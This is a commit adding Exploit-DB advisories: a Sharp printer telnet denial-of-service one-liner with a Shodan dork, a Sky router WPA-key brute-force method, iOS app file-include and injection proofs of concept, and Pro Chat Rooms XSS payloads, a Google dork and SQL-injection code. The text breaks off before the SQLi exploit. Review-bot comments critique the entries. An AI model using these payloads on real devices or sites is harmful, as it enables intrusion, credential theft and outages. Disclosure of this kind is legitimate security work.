Updated 08_11_2014

Offensive Security 2014-08-11 04:39:21 +00:00
parent 0dee5d67ec
commit b3b8cbd244
7 changed files with 866 additions and 0 deletions


@ -30871,6 +30871,7 @@ id,file,description,date,author,platform,type,port
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow Vulnerabilities",2010-07-07,"Luigi Auriemma",multiple,dos,0
34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0
34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80
34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0
34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0
34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0
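Review bot: the description column in this hunk mixes two title styles: `34275,...,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities"` and `34272,...,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow"` use the ` - ` separator, while `34280,...,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities"` and the other backfilled 2010 entries run the product and the vulnerability class together; pick one form for the new entries so listings and title searches stay consistent. The port column is likewise uneven within one category: 34275 (PHP web app) records 80 while 34280 and 34282 (also PHP web apps) record 0.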
@ -30893,3 +30894,8 @@ id,file,description,date,author,platform,type,port
34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability",2010-07-11,"John Leitch",php,webapps,0
34301,platforms/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 Multiple Vulnerabilities",2010-07-12,TurboBorland,multiple,remote,0
34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 Multiple Cross Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0
34303,platforms/ios/webapps/34303.txt,"PhotoSync Wifi & Bluetooth 1.0 - File Include Vulnerability",2014-08-09,Vulnerability-Lab,ios,webapps,8000
34305,platforms/ios/webapps/34305.txt,"Easy FTP Pro 4.2 iOS - Command Injection Vulnerabilities",2014-08-09,Vulnerability-Lab,ios,webapps,8080
34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23
34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0
34308,platforms/php/webapps/34308.txt,"TomatoCart 1.x - SQL Injection Vulnerability",2014-08-09,Breaking.Technology,php,webapps,80
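Review bot: entry 34307 is filed under platforms/hardware/dos/ with type dos, but its description, "Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm", and the advisory itself describe a weak default-key generation scheme that permits an offline dictionary attack once a handshake is captured, not a denial of service; the advisory's own header says `Category: Remote`. File it under a matching category so type-based searches are not misleading. The other new entries in this hunk are consistent with their advisories (34306 records port 23 and its PoC targets telnet; 34303 and 34305 record 8000 and 8080, the ports the two iOS apps listen on).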


@ -0,0 +1,19 @@
# Exploit Title: SHARP MX Series - Denial Of Service
# Date: 08/08/2014
# Exploit Author: pws
# Vendor Homepage: Sharp Printers
# Firmware Link: Not found
# Tested on: Latest version
# Shodan d0rk: "SHARP Telnet server" ~4000 devices
# CVE : None yet
$ python -c 'print "A"*200 + "\n"' | nc 192.168.30.5 23
$ telnet 192.168.30.5 23
Trying 192.168.30.5 23...
telnet: Unable to connect to remote host: Connection refused
This vulnerability leads to a Denial of Service vulnerability.
Unfortunately, we were unable to retrieve the core dumped but
this flaw might result in a Buffer Overflow allowing remote command execution.
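Review bot: `# Tested on: Latest version` and `# Firmware Link: Not found` do not identify what was tested; record the MX model and the firmware version string the device reports (telnet banner or web UI status page) so readers can tell whether their units are affected. The PoC demonstrates only that the telnet listener stops accepting connections after one 200-byte line; the closing text then speculates about a buffer overflow and remote command execution without a crash dump, so the entry should state plainly that only the DoS is demonstrated, and should say whether the service recovers on its own or the device needs a power cycle, since that determines the operational impact.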

@ -0,0 +1,52 @@
# Exploit Title: Sky Broadband Router ? Weak algorithm used to generate WPA-PSK Key
# Google Dork:
# Date: 08/08/2014
# Author: Matt O'Connor / Planit Computing
# Advisory Link: http://www.planitcomputing.ie/sky-wifi-attack.pdf
# Version:
# Category: Remote
# Tested on: Sky SR101 Router
The SR101 routers supplied by Sky Broadband are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker.
The WPA-PSK pass phrase has the following features:
? Random
? A to Z Uppercase only
? 8 characters long
? 208,827,064,576 possible combinations ( AAAAAAAA ? ZZZZZZZZ ) 26^8
We notified Sky Broadband about the problem in January 2014 yet Sky Broadband are still supplying customers with routers / modems that use this weak algorithm.
At the time, graphics cards were expensive and clustering several machines was not financially viable to the average hacker.
We purchased a used rig in December 2013, comprising off:
? Windows 7
? I3 Processor
? 4GB RAM
? 2TB Drive
? Radeon HD 5850
We generated 26 dictionary files using ?mask processor? by ATOM, piping each letter out to its own file, for example:
A: ./mp32 A?u?u?u?u?u?u?u > A.TXT = AAAAAAAA ? AZZZZZZZ
B: ./mp32 B?u?u?u?u?u?u?u > B.TXT = BAAAAAAA ? BZZZZZZZ
etc
Each .txt file weighed in at around 60GB?s each. The 26 files took up about 1.6TB of storage.
We now had the complete key space, partitioned into 26 different files. This allowed us to distribute the brute force attack amongst multiple computers. There are other ways with ocl-hashcat but this was the simplest.
Using our Radeon HD5850 on standard settings, we were hitting 80,000 keys per second. Breakdown below:
? 26^8 = 208,827,064,576 ( 208 billion possible combinations )
? 26^8 / 80,000 keys per second = 2,610,338 seconds
? 2,610,338 / 60 seconds = 43,505 minutes
? 43,505 / 60 minutes = 725 hours
? 725 hours / 24 hours = 30 Days
For ?185, we had built a computer that could crack the default Sky Broadband wireless password within 30 days. The WPA-PSK handshake we used started with the letter S and was cracked within 96 hours.
We ended up getting a second machine for the same price which resulted in our maximum cracking time being reduced to 15 days.
If you?re using the default password on your Sky Broadband connection, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols.
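Review bot: the file was saved in an encoding that turned every non-ASCII character into `?`: the title reads `Sky Broadband Router ? Weak algorithm`, the list bullets and curly quotes are gone (`?mask processor?`, `60GB?s`, `AAAAAAAA ? ZZZZZZZZ`), and the line `For ?185, we had built a computer` has lost its currency symbol; re-save as UTF-8 before this lands. The `# Google Dork:` and `# Version:` fields are empty and should be filled or dropped (the affected firmware version is what a reader needs in order to check a device). Minor: `comprising off:` should read `comprising:`. The arithmetic in the breakdown list checks out (26^8 / 80,000 keys/s is about 2.61 million seconds, roughly 30 days).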

platforms/ios/webapps/34303.txt Executable file
@ -0,0 +1,238 @@
Document Title:
===============
PhotoSync Wifi & Bluetooth v1.0 - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1289
Release Date:
=============
2014-08-04
Vulnerability Laboratory ID (VL-ID):
====================================
1289
Common Vulnerability Scoring System:
====================================
6.8
Product & Service Introduction:
===============================
PhotosSync - Wifi Bluetooth let you transfer photos from one iPhone, iPod Touch, iPad to another iPhone, iPod Touch, iPad, Mac and PC.
- Wifi Transfer, support PhotosSync or most web browsers(safari, firefox, chrome, opera, IE)
- Bluetooth Transfer, very useful when no wifi , no network available
- Upload photos from Mac/PC to iPhone, iPad, iPod Touch (Wifi needed)
- QRCode, scan QRCode to download photo, very convenient
( Copy of the Homepage: https://itunes.apple.com/ke/app/photossync-wifi-bluetooth/id570672848 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official PhotoSync Wifi&Bluetooth 1.0 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-08-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Haixia Liu
Product: PhotoSync Wifi&Bluetooth - iOS Mobile Web Application 1.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official PhotoSync Wifi&Bluetooth 1.0 iOS mobile application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include
execution occcurs in the index `file list` context next to the vulnerable `filename` item value. The attacker is able to inject the
local malicious file request by usage of the available `wifi interface` (http://localhost:8000/) upload form.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count
of 6.8. Exploitation of the local file include web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] PhotoSync Wifi&Bluetooth 1.0
Vulnerable Module(s):
[+] upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] PhotoSync Images Dir Listing (http://localhost:8000/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers without privileged application user account and
without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue.
PoC:
http://localhost:8000/images/./[LOCAL FILE INCLUDE VULNERABILITY!]
PoC: Index File Dir Listing (http://localhost:8000/)
<script type="text/javascript">
function selectDivImage(div) {
if (div.children[1].style.visibility == "hidden")
{
div.children[1].style.visibility = "visible";
}
else
{
div.children[1].style.visibility = "hidden";
}
}
function saveImages() {
var divs = document.getElementsByTagName('div');
for (var i = 0; i < divs.length; i++)
{
var div = divs[i];
if (div.children[1].style.visibility == "visible")
{
var str = div.children[0].src;
if (str.indexOf("Video") != -1)
{
str = str.replace(".jpg", ".mov");
}
window.open(str.replace("_thumbnail", ""));
}
}
}
function selectImages() {
var divs = document.getElementsByTagName('div');
for (var i = 0; i < divs.length; i++)
{
divs[i].children[1].style.visibility = "visible";
}
}
function deselectImages() {
var divs = document.getElementsByTagName('div');
for (var i = 0; i < divs.length; i++)
{
divs[i].children[1].style.visibility = "hidden";
}
}
</script>
<span style="padding-left:50px"></span>
<span style="color: blue; cursor: pointer;" onclick="deselectImages();">Deselect All</span>
<span style="padding-left:5px"></span>
<span style="color: blue; cursor: pointer;" onclick="selectImages();">Select All</span>
<span style="padding-left:5px"></span>
<span style="color: blue; cursor: pointer;" onclick="saveImages();">Save</span><br>
<div onselectstart="return false;" onclick="selectDivImage(this);">
<img src="./[LOCAL FILE INCLUDE VULNERABILITY!].png" height="75" width="75">
<img src="images/./[LOCAL FILE INCLUDE VULNERABILITY!].png" style="position:absolute; left:2px; top:2px; visibility: hidden;" height="75" width="75">
</div>
--- PoC Session Logs [POST] (LFI) ---
Status: [OK]
POST http://localhost:8000/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/]
POST-
Daten:
POST_DATA[-----------------------------881789944691
Content-Disposition: form-data; name="file1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
Solution - Fix & Patch:
=======================
The file include web vulnerability can be patched by a secure encode of the vulnerable file name value. Encode and filter also the vulnerable output in
the images dir index listing file. Restrict the filename value input and filter the requests to prevent against further local file include attacks
against the main directory listing service.
Security Risk:
==============
The security risk of the local file include web vulnerability in the upload module of the mobile application is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
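Review bot: the advisory contradicts itself on the attack vector: `Exploitation Technique: Local` and the PoC section say `local attackers`, while Technical Details says `Remote attackers are able to inject own files` through the wifi upload form on port 8000, which anyone on the same network can reach. State one vector and keep the CVSS of 6.8 and `Severity Level: High` consistent with it. Also, what the PoC session log and listing source actually show is the submitted `filename` (including its `./` path segment) written unescaped into `<img src="./[LOCAL FILE INCLUDE VULNERABILITY!].png" ...>` of the directory listing; that is unsanitised path/markup injection in the listing, not inclusion of a local file, so the title and the fix section should describe the impact that is demonstrated rather than a generic "file include".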

platforms/ios/webapps/34305.txt Executable file
@ -0,0 +1,347 @@
Document Title:
===============
Easy FTP Pro v4.2 iOS - Command Inject Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1291
Release Date:
=============
2014-08-06
Vulnerability Laboratory ID (VL-ID):
====================================
1291
Common Vulnerability Scoring System:
====================================
5.7
Product & Service Introduction:
===============================
The Best FTP and SFTP client for iPhone and iPad! Easy FTP is an FTP (File Transfer Protocol) and SFTP client for
iPhone/iPod Touch. Easy FTP offer all the features of a desktop client. Also includes a web browser that allow to
download files, audio player, mp4, avi,... video player, Dropbox, also helps you to access files on your remote
computer (Mac, Windows, Linux), NAS Servers, and more.
( Copy of the Homepage: https://itunes.apple.com/en/app/easy-ftp-pro/id429071149 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two command injection web vulnerabilities in the official Easy FTP Pro v4.2 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-08-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Juan Ramon Rivero
Product: Easy FTP Pro - iOS Mobile Web Application 4.2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Two local command inject web vulnerabilities has been discovered in the official Easy FTP Pro v4.2 iOS mobile application.
The vulnerability allows remote attackers to inject own commands by usage of misconfigured stored system/device values to
compromise the apple mobile iOS application.
The first vulnerability is located in the vulnerable `foldername` value of the `easy ftp wifi` module. Local attackers are
able to inject own malicious system specific commands or path value requests in the vulnerable `foldername` input value.
The execution of the command occurs in the `File Dir Index Listing` module of the easy ftp pro v4.2 mobile application.
The attacker is able to manipulate the local device values with physical or restricted acccess to compromise the mobile
application by preparing to change the foldername. The encoding of the vulnerable values in the `File Dir Index Listing`
module is broken.
The second vulnerability is also located in the `?asy ftp wifi` module. The same attack like on changing a foldername can
be exploited by attacker through the regular filename validation. The attacker is able to manipulate the local device values
with physical or restricted acccess to compromise the mobile application by preparing to change the filename.
The attack vector is located on the application-side and the injection requires physical device access or a local low
privileged device user account. Local attackers are also able to exploit the albumname validation issue in combination
with persistent injected script codes.
The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability
scoring system) count of 5.7. Exploitation of the command/path inject vulnerability requires a low privileged iOS device
account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized
execution of system specific commands and unauthorized path value requests to compromise the mobile iOS application or the
connected device components.
Request Method(s):
[+] [Sync]
Vulnerable Module(s):
[+] Add File & Rename File + Import
[+] Add Folder & Rename Folder + Import
Vulnerable Parameter(s):
[+] foldername
[+] filename
Affected Module(s):
[+] File Dir Index Listing
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local attackers with low privileged or restricted device user account
with physical access and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided
information and steps below to continue.
PoC #1:
--- PoC Session Logs [GET] (Execution) ---
Status: pending[]
GET http://localhost:8080/[LOCAL COMMAND INJECT VULNERABILITY!] Load Flags[VALIDATE_ALWAYS ] Gr??e des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
12:26:56.763[0ms][total 0ms]
Status: 200[OK]
GET http://localhost:8080/index Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
12:27:11.166[0ms][total 0ms] Status: Aus dem Cache geladen[Aus dem Cache geladen]
GET http://localhost:8080/# Load Flags[LOAD_FROM_CACHE ] Gr??e des Inhalts[-1] Mime Type[unbekannt]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
PoC: Source Foldername - File Dir Index Listing
<script type="text/javascript" charset="utf-8">
function eliminaArchivo(archNombre){
$.post("/delete/"+archNombre,
function(data) {
cargaLista(rutaActual);
});
}
function comprueba(){
var fullPath = document.getElementById('uploadFile').value;
if (fullPath) {
var startIndex = (fullPath.indexOf('\\') >= 0 ? fullPath.lastIndexOf('\\') : fullPath.lastIndexOf('/'));
var filename = fullPath.substring(startIndex);
if (filename.indexOf('\\') === 0 || filename.indexOf('/') === 0) {
filename = filename.substring(1);
}
filenombre = filename;
}
return true;
}
var rutaActual = '';
function confirma(nombre){
var borrar = confirm("Do you really want to delete: "+unescape(nombre)+"?");
if (borrar == true){
//return true;
eliminaArchivo(nombre);
}
return false;
}
function cargaLista(ruta){
$("#filelist").empty();
$("#folder").empty();
var send = ruta;
if(ruta == '..'){
if(rutaActual.lastIndexOf('/')>=0)
send = rutaActual.substr(0,rutaActual.lastIndexOf('/'));
else
send = '';
}
$.ajaxSetup({cache: false});
$.getJSON('/files/'+send/*'/files/'+ruta*/,
function(data){
var shadow = false;
//console.log(data);
rutaActual = data.currentDir;
$('#folder').append('Current path: Documents/' +data.currentDir);
$.each(data.files, function(i,item){
var trclass='';
if (shadow)
trclass= " class='shadow'";
encodeName = (encodeURI(rutaActual)+'/'+item.name).replace("'", "'");
var html = '';
if(item.type == 'FILE')
html += "<tr" + trclass + "><td class='icon'> </td><td class='filename'><a href='/files/" + encodeName + "' class='file'>" +
decodeURI(item.name) + "</a></td>" + "<td class='size'>" + item.tam + "</td>";else
html += "<tr" + trclass + "><td class='icon'><img src=\"folder.png\" alt=\"folder\" height=20 width=20 /></td><td class='filename'>
<a href='javascript:cargaLista(\"" + encodeURI(item.path).replace("'", "'") + "\")' class='file'>" + decodeURI(item.name) + "</a></td>"+"<td class='size'> </td>";
html += "<td class='date'>" + item.date + "</td>" +
"<td class='del'><a href='#' onclick='confirma(\""+escape(decodeURI(encodeURI(rutaActual)+'/'+item.name)).replace("'", "'")+"\")'><img src=\"delete.gif\"
alt=\"folder\" height=20 width=20 style=\"border:0;\" /></a></td></tr>";
$(html).appendTo("#filelist");
shadow = !shadow;
});
})
.error(function(){
alert('Connection error. Check if the web sharing is on and the iphone/ipod still connected to the network.');
});
}
$.ajaxSetup({cache: true});
$(document).ready(function(){
cargaLista('');
});
</script>
PoC #2:
--- PoC Session Logs [GET] (Execution) ---
Status: 200[OK]
GET http://localhost:8080/files/%3[LOCAL COMMAND INJECT VULNERABILITY!]_=1407321412178 Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS ] Gr??e des Inhalts[42] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[42]
Date[Wed, 06 Aug 2014 10:37:15 GMT]
Status: pending[]
GET http://localhost:8080/..%3C/[LOCAL COMMAND INJECT VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
PoC: Source Filename - File Dir Index Listing
<div id="tlista">
<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr>
<th class="icon"><a href="javascript:cargaLista('..')" class="file"> <img src="back.png" alt="back" border="0/" height="20" width="20"></a>
</th>
<th class="filename">
Name
</th>
<th class="size">
Size
</th>
<th class="date">
Modified
</th>
<th class="del">
<a href="javascript:cargaLista(rutaActual)" class="file"> <img src="refresh.png" alt="back" border="0/" height="16" width="16"></a>
</th>
</tr>
</thead>
</table>
<table border="0" cellpadding="0" cellspacing="0">
<tbody id="filelist"><tr><td class="icon"><img src="folder.png" alt="folder" height="20" width="20"></td><td class="filename">
<a href="javascript:cargaLista("h[LOCAL COMMAND INJECT VULNERABILITY!])" class="file">[LOCAL COMMAND INJECT VULNERABILITY!]"></a></td>
<td class='size'> </td><td class='date'>06.08.14 12:27</td><td class='del'><a href='#' onclick='confirma("/[LOCAL COMMAND INJECT VULNERABILITY!]")'>
<img src="delete.gif" alt="folder" height=20 width=20 style="border:0;" /></a></td></tr></tbody></table></iframe></a></td></tr></tbody>
Solution - Fix & Patch:
=======================
The vulnerabilities can be patched by a secure parse and encode of the vulnerable file- and foldername values.
Restrict the local app user input on both values to prevent further command injection attacks. Do not forget to parse the affected output listing in the file dir listing.
Security Risk:
==============
The security risk of both command inject web vulnerabilities in the file- and foldername values are estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
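Review bot: the root cause is visible in the listing script but never called out: `encodeName = (encodeURI(rutaActual)+'/'+item.name).replace("'", "'")` (and the same pattern on the `cargaLista` and `confirma` hrefs) escapes nothing as displayed, since it replaces a single quote with a single quote, and `encodeURI` leaves `'`, `(` and `)` untouched, so a file or folder name lands verbatim inside `href='javascript:cargaLista(\"...\")'` and `onclick='confirma(\"...\")'`; the mangled row `<a href="javascript:cargaLista("h[LOCAL COMMAND INJECT VULNERABILITY!])" class="file">` and the stray `</iframe></a></td></tr></tbody>` at the end of the listing confirm that the name broke out of the attribute. The fix section should therefore say to HTML-encode `item.name` and `item.path` (or build the rows with DOM APIs and `textContent`) instead of the vague `secure parse and encode`. The header also says `Exploitation Technique: Remote` while the text requires `physical or restricted acccess` (typo: `access`); pick one.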

platforms/php/webapps/34275.txt Executable file
@ -0,0 +1,157 @@
# Exploit Title: Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities
# Google Dork: intitle:"Powered by Pro Chat Rooms"
# Date: 5 August 2014
# Exploit Author: Mike Manzotti @ Dionach Ltd
# Vendor Homepage: http://prochatrooms.com
# Software Link: http://prochatrooms.com/software.php
# Version: v8.2.0
# Tested on: Debian (Apache+MySQL)
1) Stored XSS
===========
Text Chat Room Software of ProoChatRooms is vulnerable to Stored XSS. After registered an account, an attacker can upload a profile picture containing Javascript code as shown below:
POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1<http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1>
Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg"
Content-Type: image/jpeg
<script>alert(document.cookie)</script>
By inspecting the response, the web application returns a 32 digits value in the HTML tag "imgID" as shown below:
Response:
<input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b">
The picture is uploaded under the directory "/profiles/uploads" and is accessible by force browsing to the 32 digits value as shown below:
http://<WEBSITE>/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b<http://%3cWEBSITE%3e/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b>
2) Reflected XSS
=============
Text Chat Room Software of ProoChatRooms is vulnerable to Reflected XSS. The parameter "edit" is not encoded:
http://<WEBSITE>/prochatrooms/profiles/index.php?id=1&edit="><script>alert(document.cookie)</script><http://%3cWEBSITE%3e/prochatrooms/profiles/index.php?id=1&edit=%22%3e%3cscript%3ealert(document.cookie)%3c/script%3e>
3) SQL Injection
=============
Text Chat Room Software of ProoChatRooms is vulnerable to SQL injections. Across the all source code of web application, parameterized queries are used to query the database. However, a lack of data sanitization of three parameters leaves the web application vulnerable to SQLi. The vulnerable parameters are located as shown below:
prochatrooms_v8.2.0/includes/functions.php: ~2437
$params = array(
'password' => md5($password),
'email' => makeSafe($email),
'id' => $id
);
$query = "UPDATE prochatrooms_users
SET email = '".$email."',
password='".md5($password)."'
WHERE id = '".$id."'
";
prochatrooms_v8.2.0/includes/functions.php: ~2449
$query = "UPDATE prochatrooms_users
SET email = '".$email."'
WHERE id = '".$id."'
";
prochatrooms_v8.2.0/includes/functions.php: ~3110
$query = "UPDATE prochatrooms_users
SET active = '".$offlineTime."', online = '0'
WHERE username = '".makeSafe($toname)."'
";
Note that the "makeSafe" function is defined as shown below and will protect against XSS attacks only:
prochatrooms_v8.2.0/includes/functions.php: ~125
function makeSafe($data)
{
$data = htmlspecialchars($data);
return $data;
}
After registering an account, an attacker can exploit the SQL injection by editing the field email as shown below which will retrieve the MD5 hashed password of the administrator:
